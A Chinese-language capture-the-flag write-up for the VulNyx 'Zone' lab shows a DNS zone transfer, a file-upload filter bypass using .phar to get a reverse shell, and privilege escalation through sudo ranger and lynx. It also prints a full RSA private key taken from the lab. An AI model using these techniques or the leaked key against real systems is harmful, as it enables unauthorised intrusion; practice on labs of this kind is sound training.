首页 靶场练习 VulNyx Easy

# 靶场搭建

下载:Zone

Nat,IP: 192.168.1.140

# 渗透过程

# 信息初收集

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 f7:ea:48:1a:a3:46:0b:bd:ac:47:73:e8:78:25:af:42 (RSA)
|   256 2e:41:ca:86:1c:73:ca:de:ed:b8:74:af:d2:06:5c:68 (ECDSA)
|_  256 33:6e:a2:58:1c:5e:37:e1:98:8c:44:b1:1c:36:6d:75 (ED25519)
53/tcp open  domain  (unknown banner: not currently available)
| dns-nsid: 
|_  bind.version: not currently available
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|     bind
|_    currently available
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
User-agent: *
Allow: /

Sitemap: http://securezone.nyx/sitemap.xml

404 了,无妨,看看 dns 服务

┌──(root㉿kali)-[~]
└─# dig axfr securezone.nyx @192.168.1.140
; <<>> DiG 9.19.21-1-Debian <<>> axfr securezone.nyx @192.168.1.140
;; global options: +cmd
securezone.nyx.         604800  IN      SOA     ns1.securezone.nyx. root.securezone.nyx. 2 604800 86400 2419200 604800
securezone.nyx.         604800  IN      NS      ns1.securezone.nyx.
admin.securezone.nyx.   604800  IN      A       127.0.0.1
ns1.securezone.nyx.     604800  IN      A       127.0.0.1
upl0ads.securezone.nyx. 604800  IN      A       127.0.0.1
www.securezone.nyx.     604800  IN      A       127.0.0.1
securezone.nyx.         604800  IN      SOA     ns1.securezone.nyx. root.securezone.nyx. 2 604800 86400 2419200 604800
;; Query time: 0 msec
;; SERVER: 192.168.1.140#53(192.168.1.140) (TCP)
;; WHEN: Thu May 23 00:27:02 EDT 2024
;; XFR size: 7 records (messages 1, bytes 248)
拿到了一些域名,开整
upl0ads.securezone.nyx 有东西是一个上传点,有过滤
php 的站点,直接加载字典枚举可上传类型,得到 .phar 可以上传
枚举一下目录得到 uploads 目录,访问得到反弹 shell: http://upl0ads.securezone.nyx/uploads/shell.phar
# 提权
sudo -u hans /usr/bin/ranger /home/hans/.ssh/
运行的时候可能会报错,需要 export 一下 TERM,定义一个终端类型
找到 id_rsa
处理一下:
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAhn+arnDjdGhAOISOkE3R8d2Zb0v8fkZVtUL0Y7xFPTvbMVDW
eCFR1ZEjJz9AyXyYXLybnN3OcpenEnegj7xSTBTPZ8wUfILanKplTgxoiX59wNq6
eLXsq7y90ZKlrR2cYwh9L+RkINgWR++jdoq9WDS06Ck9nMWiS/rwQU6qsVWi03Gv
3GmDgXgBQC+gwIZBAvevU4NL8YxH6AFc7MacnbCY2inJPgadPGVESGaF4JhiNp7E
wRj2f96W/Je4zdYHNi3aOdk+U36iPxxHnr6IWpLZtRNPqn67JeYryKpXTQe5PkIn
vWGb06Vxe1qDr5/Ge68fBsvj2BR1PlyOQMuVHwIDAQABAoIBAG12ApR/yY3eno2g
zEoDG59lg09CH09BvNVVlYJqIkuwoDalnLaOH4TZpyt03ixdG781vMvQ9QjsBYwR
EfqJAM1sjlPikrW25WZlgycfECD+cif3m5VMMj6e0Dl0ySN4GuO6b+//R8I3OwL2
tClwxqK32peroLorWmfN5aSw+lhxrYKrB2HfQCIlFtRJ6RIuVMFPMxaEu84CkeXC
V6m4LTFC5ZsE9bAR2rL0T2iZxRsflwG4n/KNPRGYjavOFzeSZP95dhp0qJ4DJ8us
LW+0+FPjl1bhD3Msn55xNTxDBaSvzDCokveqKbRTAzT5IuyULE2SuezVwuhfuliS
0n9mrZECgYEA5lBq+2Ss/vKyovRVnjINklZNe24HjPWPao6B7BsR+u+rC9uQbO5l
KLwkLEifAYOLpoZ6+qW166mOFp19dJ0WNLG9Ii/nWmkCPNzKBj1/g6noZ+VAkXmS
DGdyxHNqd2rHCzVdmnqjchqpwb9lUzz5LlQj3GmL63dI6OKx3LoST5kCgYEAlX+Z
99sGLaXu4EKL2bX9bpEnQtHoCN3ruvLjqlaOciCZVomyEhkx7R9W28cx+GfWB9t5
FgSI5i7RQFZeS/oj+WyRwJPuhn8r0ywr637AqXuOzpZRAtW5xMihuNV9m71OtvNJ
Kg4g0r7UnBvB7eRnCGuDEJWohwiDAKrCfWkOXXcCgYBXAY5IxjGsZpchhFhL2PDT
lZLTzC9CCwpQ4OEoBtn2CFB/vESFQlIo31py+ERJWB6LnEYdJjjhfD5XQMvCIA3h
fjvLDHnD5+OWhnozfUwMu0U26p5H1rtbwEDVAhz4W/gxvclMsIPKeVQkA2AN3/zq
iZK6k4zuOTPr9qfmkMyWEQKBgDQcx9ITYkL1TaCU8eURQGeTZ6kuPIEiwrJnSp8t
DviPjoQQ+aa/a5zpyMBR3oRlxcD1a28WY5ZBiaWwtawsZO/kPaZwqrvthpxVEHZF
t+kcbfprgY/IarpC6cThfqiUQ+UYR0/GnwB3jutf7aj8bkIMICLe2GFBwVCxNZy7
y0sfAoGBAK5PtpZvm3+Us04V9S5/oOGNSvVWdyoGDLIDaXVGJOHx7kl2FrZWk9K+
+1n0ptiCFDq5ZYl2Sa5paCBj1RblKYbfXWTfNZyjhq2SXNsJXr8vWMh7Jc4tHoxc
190wHQ1TlsKy7WqTgdlX0ncG4Z58OqGe3OOTPKQ4gtzxAIaLe+Ex
-----END RSA PRIVATE KEY-----

ssh 到 hans 的 shell
然后 sudo -l 发现可以 sudo lynx
然后 ! 切换到 root 的终端,OK 了
# 小结
Lynx 是一个文本模式的网页浏览器,它以纯文本的形式显示网页内容而不显示图形或多媒体元素。它通常在终端环境下使用,可以通过命令行输入网址来访问网页。
Lynx 是一个古老但功能强大的工具,尤其适合在基于文本的用户界面(如 SSH 会话或终端窗口)下浏览互联网。它被广泛用于服务器环境、远程终端访问或者在网络连接速度较慢的情况下进行简单的网页浏览。
由于它只显示文本内容,Lynx 在一些情况下可能无法完全呈现包含复杂布局、图像或多媒体的网页,但对于需要快速获取信息或者在资源受限的环境下进行网页浏览来说,Lynx 是一个非常有用的工具。